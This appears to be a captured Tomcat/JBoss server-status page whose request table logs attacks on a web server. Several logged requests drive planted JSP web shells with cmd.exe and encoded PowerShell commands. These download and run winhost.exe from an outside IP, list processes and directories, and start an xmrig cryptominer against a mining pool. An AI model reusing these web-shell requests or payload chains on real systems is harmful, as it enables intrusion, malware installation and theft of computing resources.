JVM

Free memory: 98.51 MB Total memory: 182.50 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

StageTimeB SentB RecvClientVHostRequest

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 42 Current thread busy: 16
Max processing time: 27510 ms Processing time: 41994.95 s Request count: 62691 Error count: 1387 Bytes received: 2.55 MB Bytes sent: 1872.00 MB

StageTimeB SentB RecvClientVHostRequest
S449249124 ms0 KB0 KB185.248.140.17581.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F185.248.140.175%2Fx%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
R??????
S146512600 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADIAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S146151940 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
S146031634 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S145911439 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S146753207 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S449218157 ms0 KB0 KB185.248.140.17581.45.140.46GET /jexws4/jexws4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F185.248.140.175%2Fx%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
S449187689 ms0 KB0 KB185.248.140.17581.45.140.46GET /jexws4/jexws4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F185.248.140.175%2Fx%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
R??????
S147113919 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
S146272175 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S147234093 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S146993689 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=i&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
S146632983 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20bABzACAAZAA6AFwA&pwd=asicanv8aw&l=-1 HTTP/1.1
S146873498 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZABpAHIAIABkADoAXAA=&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
S146392413 ms0 KB0 KB60.1.206.4381.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20ZAA6AFwAXAB4AG0AcgBpAGcALgBlAHgAZQAgAC0AbwAgAHAAbwBvAGwALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA0ADQAMwAgAC0AdQAgADgAMwBEADMANwBnAFgAdgBCAHEAVwBHAGcAWABnAGYASABmAHIANQBVAG4AMQBxAGEAUQBxAFUAYQBFAGgAWgB0AGcAZgBLAFgAZwBlAEwAVwBZAFYAdwAzAEwATABkAEMATQBjAHMAdABIAFEAQQA0AHoAbQB3AGIAYwByADcAbwBqADIAdABOADIARgBmAHgAVABqAGMAcABOAHgAeQA3AFgAcgA5AFEARQBNAFMAUQAxAEYAUwB0AHEAaQAgAC0AawAgAC0AdAAgADIAIAAtAC0AdABsAHMAIAAtAC0AcgBpAGcALQBpAGQAIABqAGIAXwA5AA==&pwd=asicanv8aw&l=15 HTTP/1.1
S97 ms8 KB0 KB3.235.223.5catalogo.museolazarogaldiano.esGET /status HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive